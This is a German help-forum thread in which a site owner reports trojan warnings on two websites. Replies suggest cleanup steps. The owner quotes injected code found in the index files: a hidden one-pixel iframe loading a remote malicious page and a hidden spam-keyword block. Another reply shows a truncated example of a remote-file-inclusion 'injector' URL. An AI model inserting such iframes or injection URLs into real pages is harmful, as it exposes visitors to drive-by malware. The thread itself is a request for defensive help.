6
Probleme mit Trojaner Warnungen auf meinen Webseiten
Hallo zusammen
Ich habe da glaube ich ein ernstes Problem
Meine beiden Seiten, www.die-lehrstellenaktion.de und www.die-lehrstellenaktion.at scheinen von Trojanern / Viren befallen zu sein.
Bei www.die-lehrstellenaktion.de erhalte ich diese Warnungen Trojan-Downloader.JS.IESlice.s bzw. Trojan.JS.Redirector.e
Bei www.die-lehrstellenaktion.at wird unten links in der Statusleiste beim internen Seitenwechsel ganz kurz folgende URL angezeigt www.leohin.com/diamond/...
Laut 1&1 , meinem Webhoster können die nix finden.
Ich möchte meine Seiten sauber und sicher haben, doch weiß ich nicht wie.
Der Programmierer hat auch leider keine Lösung, da er mir die Seiten zum Selbstkosten Preis realisiert hat, ohne die die Umsetzung nicht möglich gewesen wäre.
Ich hoffe das mir jemand helfen kann. Ich selber habe null Ahnung von Webprogrammierung...
Gruß
Ich habe da glaube ich ein ernstes Problem
Meine beiden Seiten, www.die-lehrstellenaktion.de und www.die-lehrstellenaktion.at scheinen von Trojanern / Viren befallen zu sein.
Bei www.die-lehrstellenaktion.de erhalte ich diese Warnungen Trojan-Downloader.JS.IESlice.s bzw. Trojan.JS.Redirector.e
Bei www.die-lehrstellenaktion.at wird unten links in der Statusleiste beim internen Seitenwechsel ganz kurz folgende URL angezeigt www.leohin.com/diamond/...
Laut 1&1 , meinem Webhoster können die nix finden.
Ich möchte meine Seiten sauber und sicher haben, doch weiß ich nicht wie.
Der Programmierer hat auch leider keine Lösung, da er mir die Seiten zum Selbstkosten Preis realisiert hat, ohne die die Umsetzung nicht möglich gewesen wäre.
Ich hoffe das mir jemand helfen kann. Ich selber habe null Ahnung von Webprogrammierung...
Gruß
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 80688
Url: https://administrator.de/contentid/80688
Printed on: April 27, 2024 at 01:04 o'clock
6 Comments
Latest comment
du scheinst da ein/mehere Javascripte zu haben wo sich der Trojaner befindet bzw ein Script? was da nicht hingehört
jedoch ohne einsicht kannst nur du selber dich auf die Suche machen.
Die frage ist auch wie der Schadcode bei dir reingekommen ist
Sicherheitslücke? Fehlerhaftes Programieren?
jedoch ohne einsicht kannst nur du selber dich auf die Suche machen.
Die frage ist auch wie der Schadcode bei dir reingekommen ist
Sicherheitslücke? Fehlerhaftes Programieren?
Gehört zwar nicht hier her aber, tolle Seite. Hab’s gleich unseren Ausbildungsmeister geschickt.
Das hat wirklich Respekt verdient.
Das hat wirklich Respekt verdient.
Hallo,
hast du noch eine Lokale Sicherung der Skripte? Und die Daten liegen in einer Datenbank? Der Trojaner (so vorhanden) muss ja irgendwo liegen. Wenn du also alle Skripte löschst unad anschließend von deinem Rechner (wo noch keine Viren drauf sind) neu hochlädst sollte auch der Trojaner weg sein.
Vorher sicherstellen, dass man von allem aktuelle Backups hat.
Gruß
Filipp
hast du noch eine Lokale Sicherung der Skripte? Und die Daten liegen in einer Datenbank? Der Trojaner (so vorhanden) muss ja irgendwo liegen. Wenn du also alle Skripte löschst unad anschließend von deinem Rechner (wo noch keine Viren drauf sind) neu hochlädst sollte auch der Trojaner weg sein.
Vorher sicherstellen, dass man von allem aktuelle Backups hat.
Gruß
Filipp
Hat vielleicht jemand deine FTP-Daten geknackt?
Einfach mal die FTP-Passwörter ändern und nach Möglichkeit den sauberen Code vom eigenen Rechner wieder hochladen.
Einfach mal die FTP-Passwörter ändern und nach Möglichkeit den sauberen Code vom eigenen Rechner wieder hochladen.
Hallo, vielen Dank für Eure / Ihre Antworten.
Ich habe das hier in den beiden index Dateien gefunden:
<? include("login.php");?>
</p> <p style="line-height:150%; margin-top:0; margin-bottom:0;">
</p><iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
<div style="display:none">buy viagra
buy levitrabuy viagra, buy xenical, viagra,buy levitra, pornoLego toys
Lego
</div>
Ich habe bereits dem Programmiere gebeten diese Einträge zu löschen und das Loginfeld vor weiteren Angriffen zu schützen.
Wenn mir jemand sagen könnte wie wir / er dies am sichersten tun könnte wäre ich mehr als dankbar.
Nochmals muss ich erwähnen, das der Programmierer mein vollstes Vertrauen hat und die Seiten nicht hätten realisiert werden können, wenn er diese zu einem "normalen" Satz abgerechnet hätte ...
Gruß
Ich habe das hier in den beiden index Dateien gefunden:
<? include("login.php");?>
</p> <p style="line-height:150%; margin-top:0; margin-bottom:0;">
</p><iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
<div style="display:none">buy viagra
buy levitrabuy viagra, buy xenical, viagra,buy levitra, pornoLego toys
Lego
</div>
Ich habe bereits dem Programmiere gebeten diese Einträge zu löschen und das Loginfeld vor weiteren Angriffen zu schützen.
Wenn mir jemand sagen könnte wie wir / er dies am sichersten tun könnte wäre ich mehr als dankbar.
Nochmals muss ich erwähnen, das der Programmierer mein vollstes Vertrauen hat und die Seiten nicht hätten realisiert werden können, wenn er diese zu einem "normalen" Satz abgerechnet hätte ...
Gruß
Hallo...
!!! ACHTUNG... !!! Dieser Beitrag enthält eine Beispiel-URL für einen sog. Injector-Link. Obwohl diese URL zum Zeitpunkt der Erstellung dieses Beitrages ins Leere geht, sei jedem dringlichst geraten dem Link niemals zu folgen!
Der Trojan.JS.Redirector.e wütet auch gerade bei einem meiner "Kunden". Leider ist es bei diesem nicht damit getan, einfach ein vierenfreies Backup der Web-Anwendung einzuspielen. Bei dem Kunden war der Virus nach ca. 2 Tagen wieder da. Vermutlich befindet sich irgenwo in der Datenbank ein sog. Injector-Link welcher die Virendateien von einem Fremd-Server über die URL auf den Server lädt (z.B. mit http://never.follow.me/products_new.php?action=http%3A%2F%2Fwww.oriolma ... ... vom Forum gekürzt... Komplettansicht im Quelltext). Ein FTP-Zugang ist dafür nicht erforderlich.
Ich würde, bevor ich das Backup einspiele, die Datenbank eindringlich nach URLs dieser Art durchsuchen.
mfg
0x0badc0de
!!! ACHTUNG... !!! Dieser Beitrag enthält eine Beispiel-URL für einen sog. Injector-Link. Obwohl diese URL zum Zeitpunkt der Erstellung dieses Beitrages ins Leere geht, sei jedem dringlichst geraten dem Link niemals zu folgen!
Der Trojan.JS.Redirector.e wütet auch gerade bei einem meiner "Kunden". Leider ist es bei diesem nicht damit getan, einfach ein vierenfreies Backup der Web-Anwendung einzuspielen. Bei dem Kunden war der Virus nach ca. 2 Tagen wieder da. Vermutlich befindet sich irgenwo in der Datenbank ein sog. Injector-Link welcher die Virendateien von einem Fremd-Server über die URL auf den Server lädt (z.B. mit http://never.follow.me/products_new.php?action=http%3A%2F%2Fwww.oriolma ... ... vom Forum gekürzt... Komplettansicht im Quelltext). Ein FTP-Zugang ist dafür nicht erforderlich.
Ich würde, bevor ich das Backup einspiele, die Datenbank eindringlich nach URLs dieser Art durchsuchen.
mfg
0x0badc0de